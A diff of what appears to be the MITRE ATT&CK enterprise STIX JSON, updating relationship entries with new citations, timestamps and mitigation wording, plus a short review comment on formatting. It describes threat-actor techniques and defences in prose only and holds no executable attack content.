+ "modified": "2020-07-09T13:54:28.910Z",
"created": "2019-06-25T12:37:30.078Z"
},
{
@@ -144095,7 +145425,7 @@
"description": "Block unknown devices and accessories by endpoint security configuration and monitoring agent.",
"id": "relationship--b28f8635-6a79-4be1-b05a-b4356a04e7c2",
"type": "relationship",
- "modified": "2019-07-17T21:35:07.124Z",
+ "modified": "2020-07-14T19:36:40.746Z",
"created": "2019-06-25T14:33:33.684Z"
},
{
@@ -144116,7 +145446,7 @@
}
],
"type": "relationship",
- "modified": "2019-07-17T21:35:07.133Z",
+ "modified": "2020-07-14T19:36:40.741Z",
"created": "2019-06-25T14:33:33.700Z"
},
{
@@ -144165,7 +145495,7 @@
"description": "Train users to identify social engineering techniques and spearphishing emails.",
"id": "relationship--b2dac45d-0bd8-488a-a00d-d54db8d3507c",
"type": "relationship",
- "modified": "2020-03-29T23:32:53.644Z",
+ "modified": "2020-04-29T14:37:59.738Z",
"created": "2019-06-25T15:34:24.671Z"
},
{
@@ -144186,7 +145516,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T23:32:53.660Z",
+ "modified": "2020-04-29T14:37:59.777Z",
"created": "2019-06-25T15:34:24.696Z"
},
{
@@ -144207,7 +145537,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T23:32:53.673Z",
+ "modified": "2020-04-29T14:37:59.775Z",
"created": "2019-06-25T15:34:24.698Z"
},
{
@@ -144228,7 +145558,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T23:32:53.671Z",
+ "modified": "2020-04-29T14:37:59.773Z",
"created": "2019-06-25T15:34:24.702Z"
},
{
@@ -144980,7 +146310,7 @@
"description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019."
}
],
- "description": "[Yahoyah](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)",
+ "description": "[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)",
"relationship_type": "uses",
"id": "relationship--78e60e86-72a0-4966-a1b9-19a76102d78f",
"type": "relationship",
@@ -145188,13 +146518,18 @@
"source_name": "Symantec Waterbug Jun 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
"description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019."
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
- "description": "[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also exfiltrated stolen files to OneDrive and 4shared.(Citation: ESET ComRAT May 2020)",
"relationship_type": "uses",
"id": "relationship--7dda2468-0344-48c5-8843-6655084d8159",
"type": "relationship",
- "modified": "2020-03-11T17:38:56.598Z",
+ "modified": "2020-06-29T03:35:29.737Z",
"created": "2019-07-08T15:24:24.657Z"
},
{
@@ -145379,11 +146714,11 @@
"source_name": "Unit42 Emissary Panda May 2019"
}
],
- "description": "[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (CreateProcessW) or script/file (ShellExecuteW) via API.(Citation: Unit42 Emissary Panda May 2019)",
+ "description": "[HyperBro](https://attack.mitre.org/software/S0398) has the ability to run an application (CreateProcessW) or script/file (ShellExecuteW) via API.(Citation: Unit42 Emissary Panda May 2019)",
"relationship_type": "uses",
"id": "relationship--bc8cb83f-fc66-4c44-8d60-f6f4be4b4f41",
"type": "relationship",
- "modified": "2019-07-14T21:14:18.883Z",
+ "modified": "2020-06-23T00:20:31.885Z",
"created": "2019-07-09T17:42:44.984Z"
},
{
@@ -145585,27 +146920,6 @@
"modified": "2019-07-14T21:15:55.673Z",
"created": "2019-07-09T17:54:21.445Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12",
- "target_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878",
- "external_references": [
- {
- "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
- "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.",
- "source_name": "Lookout Dark Caracal Jan 2018"
- }
- ],
- "description": "(Citation: Lookout Dark Caracal Jan 2018)",
- "relationship_type": "uses",
- "id": "relationship--53364899-1ea5-47fa-afde-c210aed64120",
- "type": "relationship",
- "modified": "2019-07-16T15:35:21.086Z",
- "created": "2019-07-10T15:47:19.659Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -145951,7 +147265,7 @@
"description": "Configure internal and external firewalls to block traffic using common ports that associate to network protocols that may be unnecessary for that particular network segment.",
"id": "relationship--205b99bf-ce60-4bb5-8916-ac9d97ce4d05",
"type": "relationship",
- "modified": "2020-03-14T18:19:15.025Z",
+ "modified": "2020-07-06T17:54:28.241Z",
"created": "2019-07-16T20:51:40.453Z"
},
{
@@ -145972,7 +147286,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-25T15:27:57.980Z",
+ "modified": "2020-07-14T19:44:51.001Z",
"created": "2019-07-16T20:53:20.687Z"
},
{
@@ -146088,7 +147402,7 @@
"description": "Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.",
"id": "relationship--7e8ca453-aee5-48c1-a891-f44a742a95ed",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.403Z",
+ "modified": "2020-06-09T20:44:40.882Z",
"created": "2019-07-17T15:45:37.493Z"
},
{
@@ -146099,7 +147413,7 @@
"source_ref": "course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462",
"target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"relationship_type": "mitigates",
- "description": "\nManage the access control list for \u201cReplicating Directory Changes\u201d and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)",
+ "description": "\nManage the access control list for \u201cReplicating Directory Changes\u201d and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL) Consider adding users to the \"Protected Users\" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)",
"id": "relationship--fc31837d-530f-45e5-b9f8-bf6268c3ef03",
"external_references": [
{
@@ -146111,10 +147425,15 @@
"url": "https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr",
"description": "Microsoft. (n.d.). How to grant the \"Replicating Directory Changes\" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.",
"source_name": "Microsoft Replication ACL"
+ },
+ {
+ "source_name": "Microsoft Protected Users Security Group",
+ "url": "https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group",
+ "description": "Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.471Z",
+ "modified": "2020-06-09T20:44:40.883Z",
"created": "2019-07-17T15:45:37.521Z"
},
{
@@ -146135,7 +147454,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.473Z",
+ "modified": "2020-06-09T20:44:40.887Z",
"created": "2019-07-17T15:45:37.529Z"
},
{
@@ -146146,17 +147465,22 @@
"source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
"target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"relationship_type": "mitigates",
- "description": "\nConsider disabling or restricting NTLM. (Citation: Microsoft Disable NTLM Nov 2012)",
+ "description": "\nConsider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)",
"id": "relationship--fe849763-78b9-4b8a-9219-2781ac7b00e8",
"external_references": [
{
"url": "https://technet.microsoft.com/library/jj865668.aspx",
"description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.",
"source_name": "Microsoft Disable NTLM Nov 2012"
+ },
+ {
+ "source_name": "Microsoft WDigest Mit",
+ "url": "https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a",
+ "description": "Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-25T16:25:17.469Z",
+ "modified": "2020-06-09T20:44:40.880Z",
"created": "2019-07-17T15:45:37.582Z"
},
{
@@ -146268,7 +147592,7 @@
"description": "Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.",
"id": "relationship--8b3f2915-ca04-4770-88bb-e6f1314da34d",
"type": "relationship",
- "modified": "2020-03-24T14:48:48.035Z",
+ "modified": "2020-06-30T22:50:06.318Z",
"created": "2019-07-17T18:51:33.926Z"
},
{
@@ -146392,7 +147716,7 @@
"description": "By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI.",
"id": "relationship--48e6b5fc-9d82-4cdf-84aa-bc23647e1234",
"type": "relationship",
- "modified": "2020-03-09T14:52:27.115Z",
+ "modified": "2020-05-13T22:50:51.536Z",
"created": "2019-07-17T20:04:40.541Z"
},
{
@@ -146403,10 +147727,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious software executed through this technique by using application whitelisting tools capable of preventing unknown DLLs from being loaded.",
+ "description": "Identify and block potentially malicious software executed through this technique by using application control tools capable of preventing unknown DLLs from being loaded.",
"id": "relationship--2c89cab1-efbb-405c-930d-197ae1910e5b",
"type": "relationship",
- "modified": "2020-03-28T18:14:37.101Z",
+ "modified": "2020-06-20T20:11:42.541Z",
"created": "2019-07-17T20:12:19.105Z"
},
{
@@ -146446,7 +147770,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T00:35:24.697Z",
+ "modified": "2020-05-20T13:33:50.934Z",
"created": "2019-07-17T20:22:08.552Z"
},
{
@@ -146471,10 +147795,17 @@
"source_ref": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"relationship_type": "mitigates",
- "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.",
+ "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.(Citation: OWASP Top 10)",
"id": "relationship--4c308ec1-f0c6-4444-af7d-ff045204c326",
+ "external_references": [
+ {
+ "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
+ "source_name": "OWASP Top 10"
+ }
+ ],
"type": "relationship",
- "modified": "2020-02-18T16:10:39.251Z",
+ "modified": "2020-07-14T22:22:06.471Z",
"created": "2019-07-17T21:07:56.528Z"
},
{
@@ -146502,7 +147833,7 @@
"description": "Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.",
"id": "relationship--9eaaffb7-4dc4-4aac-a1d5-675b71e587df",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.227Z",
+ "modified": "2020-06-19T20:07:09.773Z",
"created": "2019-07-17T21:15:42.971Z"
},
{
@@ -146516,7 +147847,7 @@
"description": "Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.",
"id": "relationship--8df2f4b5-3f60-4b8f-b4aa-dd76eb347ab0",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.252Z",
+ "modified": "2020-06-19T20:07:09.776Z",
"created": "2019-07-17T21:15:42.984Z"
},
{
@@ -146530,7 +147861,7 @@
"description": "Disable or block remotely available services that may be unnecessary.",
"id": "relationship--9aaf5e70-4080-4f73-8d6d-3b19f754e9b9",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.266Z",
+ "modified": "2020-06-19T20:07:09.800Z",
"created": "2019-07-17T21:15:42.990Z"
},
{
@@ -146544,7 +147875,7 @@
"description": "Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Two-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.",
"id": "relationship--e23d57b4-5bc4-4d06-9084-9c99464c4af8",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.268Z",
+ "modified": "2020-06-19T20:07:09.808Z",
"created": "2019-07-17T21:15:43.002Z"
},
{
@@ -146585,9 +147916,9 @@
"description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019."
},
{
- "source_name": "Microsoft WMI Filters",
+ "description": "Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019.",
"url": "https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/",
- "description": "Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019."
+ "source_name": "Microsoft WMI Filters"
},
{
"source_name": "Microsoft GPO Security Filtering",
@@ -146596,7 +147927,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T21:17:41.479Z",
+ "modified": "2020-05-20T13:49:12.427Z",
"created": "2019-07-17T21:33:42.484Z"
},
{
@@ -146694,7 +148025,7 @@
"description": "Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. ",
"id": "relationship--c4cd9acb-aaea-4b77-890e-f153a58623a4",
"type": "relationship",
- "modified": "2019-07-19T14:37:37.523Z",
+ "modified": "2020-07-14T19:33:52.657Z",
"created": "2019-07-18T15:05:36.677Z"
},
{
@@ -146867,7 +148198,7 @@
"description": "Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique.",
"id": "relationship--a9f79f14-d160-4be5-8bbe-ad0b52770b9f",
"type": "relationship",
- "modified": "2019-10-25T15:25:00.324Z",
+ "modified": "2020-07-14T19:39:44.799Z",
"created": "2019-07-18T15:36:27.535Z"
},
{
@@ -146878,10 +148209,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
"relationship_type": "mitigates",
- "description": "Use tools that restrict program execution via whitelisting by attributes other than file name for common operating system utilities that are needed.",
+ "description": "Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.",
"id": "relationship--eb5ade8c-73e9-4b69-9dea-c8a8206dec25",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.426Z",
+ "modified": "2020-07-09T13:54:28.926Z",
"created": "2019-07-18T15:46:37.654Z"
},
{
@@ -147047,7 +148378,7 @@
"description": "Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.",
"id": "relationship--9a8e7eea-dbef-45b4-9b97-0d85b5defb83",
"type": "relationship",
- "modified": "2020-03-30T13:45:24.516Z",
+ "modified": "2020-07-06T18:49:36.003Z",
"created": "2019-07-18T17:08:41.171Z"
},
{
@@ -147061,7 +148392,7 @@
"description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
"id": "relationship--4b5e8e16-ddf4-4339-859b-f70f980d612b",
"type": "relationship",
- "modified": "2020-01-22T20:28:29.856Z",
+ "modified": "2020-07-01T18:27:41.895Z",
"created": "2019-07-18T17:11:15.628Z"
},
{
@@ -147138,7 +148469,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--bcdd57cf-632f-4fc5-a8e8-d3137cb832e8",
"type": "relationship",
- "modified": "2020-03-26T20:27:44.231Z",
+ "modified": "2020-06-20T22:16:03.760Z",
"created": "2019-07-18T17:27:05.228Z"
},
{
@@ -147177,10 +148508,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
"relationship_type": "mitigates",
- "description": "Use application whitelisting to mitigate installation and use of unapproved software that can be used for remote access.",
+ "description": "Use application control to mitigate installation and use of unapproved software that can be used for remote access.",
"id": "relationship--54306888-1f93-4461-bcac-a56ae7073b31",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.926Z",
+ "modified": "2020-06-20T20:42:37.470Z",
"created": "2019-07-18T17:42:08.950Z"
},
{
@@ -147194,7 +148525,7 @@
"description": "Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.",
"id": "relationship--80a23356-20b7-49a3-a48e-e0c04e2bff86",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.922Z",
+ "modified": "2020-06-20T20:42:37.483Z",
"created": "2019-07-18T17:42:08.974Z"
},
{
@@ -147250,7 +148581,7 @@
"description": "Limit the use of USB devices and removable media within a network.",
"id": "relationship--5c245d0b-61e7-4558-8b36-32c846266af0",
"type": "relationship",
- "modified": "2019-07-18T17:52:28.558Z",
+ "modified": "2020-07-14T19:45:59.785Z",
"created": "2019-07-18T17:52:28.558Z"
},
{
@@ -147417,7 +148748,7 @@
"description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.",
"id": "relationship--b5023b20-4243-4686-8b51-429ae7ac73cb",
"type": "relationship",
- "modified": "2019-10-25T15:25:00.437Z",
+ "modified": "2020-07-14T19:34:47.808Z",
"created": "2019-07-18T19:18:32.950Z"
},
{
@@ -147933,7 +149264,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-25T15:38:35.548Z",
+ "modified": "2020-07-14T19:33:52.662Z",
"created": "2019-07-19T14:37:37.517Z"
},
{
@@ -148043,7 +149374,7 @@
"description": "[Execution Guardrails](https://attack.mitre.org/techniques/T1480) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.",
"id": "relationship--20cc9dc5-61ad-4fbb-86da-4861e60b98e4",
"type": "relationship",
- "modified": "2019-07-23T14:44:24.818Z",
+ "modified": "2020-06-24T14:37:18.194Z",
"created": "2019-07-19T14:59:44.180Z"
},
{
@@ -149532,11 +150863,11 @@
"source_name": "FireEye APT34 July 2019"
}
],
- "description": "[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019) ",
+ "description": "[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019)",
"relationship_type": "uses",
"id": "relationship--b3d6abc5-11da-4d0c-a699-8cafac03dfab",
"type": "relationship",
- "modified": "2019-09-04T22:55:41.557Z",
+ "modified": "2020-07-04T23:23:08.115Z",
"created": "2019-08-26T17:00:30.957Z"
},
{
@@ -151559,13 +152890,18 @@
"source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
"description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims\u2019 environments.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims\u2019 environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8",
"type": "relationship",
- "modified": "2019-09-23T22:53:30.177Z",
+ "modified": "2020-04-28T13:48:00.874Z",
"created": "2019-09-23T22:53:30.177Z"
},
{
@@ -151624,11 +152960,11 @@
"description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)\n",
"relationship_type": "uses",
"id": "relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a",
"type": "relationship",
- "modified": "2019-09-23T22:53:30.248Z",
+ "modified": "2020-04-30T20:31:38.353Z",
"created": "2019-09-23T22:53:30.248Z"
},
{
@@ -151666,11 +153002,11 @@
"description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) used DGA to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)",
"relationship_type": "uses",
"id": "relationship--8488f2ee-be97-458c-894b-830add635fa8",
"type": "relationship",
- "modified": "2020-03-20T19:57:43.864Z",
+ "modified": "2020-06-02T21:31:00.457Z",
"created": "2019-09-23T22:53:30.257Z"
},
{
@@ -151787,16 +153123,21 @@
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"external_references": [
{
- "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.",
+ "source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
- "source_name": "FireEye APT41 Aug 2019"
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019) ",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--6ad8e998-041f-491d-8691-4990022248e0",
"type": "relationship",
- "modified": "2019-10-14T21:52:59.706Z",
+ "modified": "2020-05-01T13:57:23.939Z",
"created": "2019-09-23T23:08:25.339Z"
},
{
@@ -151955,16 +153296,21 @@
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"external_references": [
{
- "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.",
+ "source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
- "source_name": "FireEye APT41 Aug 2019"
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70",
"type": "relationship",
- "modified": "2019-10-14T21:52:59.768Z",
+ "modified": "2020-05-01T13:57:23.946Z",
"created": "2019-09-23T23:08:25.450Z"
},
{
@@ -151997,16 +153343,21 @@
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"external_references": [
{
- "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.",
+ "source_name": "FireEye APT41 Aug 2019",
"url": "https://content.fireeye.com/apt-41/rpt-apt41",
- "source_name": "FireEye APT41 Aug 2019"
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ },
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
}
],
- "description": "[APT41](https://attack.mitre.org/groups/G0096) used cmd.exe /c to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)",
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used cmd.exe /c to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)\n[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)",
"relationship_type": "uses",
"id": "relationship--81a15403-9bb3-408a-8da6-97c64209c829",
"type": "relationship",
- "modified": "2020-03-17T18:50:16.117Z",
+ "modified": "2020-04-28T13:48:00.870Z",
"created": "2019-09-23T23:08:25.407Z"
},
{
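Review bot: The sentence appended to the description on the `+` line is joined to the existing text with a literal `\n`, while the parallel sentence appended to the StorSyncSvc relationship just above is joined with a single space, so two entries with the same structure will render differently on the ATT&CK page. Pick one joiner for both; I would drop the `\n` here so the line reads `...(Citation: FireEye APT41 Aug 2019) [APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence...`. Separately, the reordered citation description `Double DragonAPT41, a dual espionage and cyber crime operation APT41` looks like a dropped separator in the report title (presumably `Double Dragon: APT41, ...`); worth confirming against the FireEye report while this entry is being touched.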
@@ -153399,7 +154750,7 @@
"description": "Protect domain controllers by ensuring proper security configuration for critical servers to limit access by potentially unnecessary protocols and services, such as SMB file sharing.",
"id": "relationship--ff7f776f-001a-4c86-b359-08c89bd08b3e",
"type": "relationship",
- "modified": "2020-03-23T15:28:13.578Z",
+ "modified": "2020-05-04T18:36:39.480Z",
"created": "2019-10-03T18:21:39.015Z"
},
{
@@ -153469,7 +154820,7 @@
"description": "Users need to be trained to not authorize third-party applications they don\u2019t recognize. The user should pay particular attention to the redirect URL: if the URL is a misspelled or convoluted sequence of words related to an expected service or SaaS application, the website is likely trying to spoof a legitimate service. Users should also be cautious about the permissions they are granting to apps. For example, offline access and access to read emails should excite higher suspicions because adversaries can utilize SaaS APIs to discover credentials and other sensitive communications.",
"id": "relationship--9c3d1701-b0ed-4a20-a864-d2681535cfa8",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.591Z",
+ "modified": "2020-07-14T19:16:31.117Z",
"created": "2019-10-04T19:37:26.696Z"
},
{
@@ -153647,7 +154998,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.579Z",
+ "modified": "2020-07-09T14:02:05.406Z",
"created": "2019-10-05T02:15:29.999Z"
},
{
@@ -153658,10 +155009,17 @@
"source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation:Amazon S3 Security, 2019)",
+ "description": "Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation: Amazon S3 Security, 2019)",
"id": "relationship--ee3162ad-e88e-401c-9fdf-e7f0784141a4",
+ "external_references": [
+ {
+ "source_name": "Amazon S3 Security, 2019",
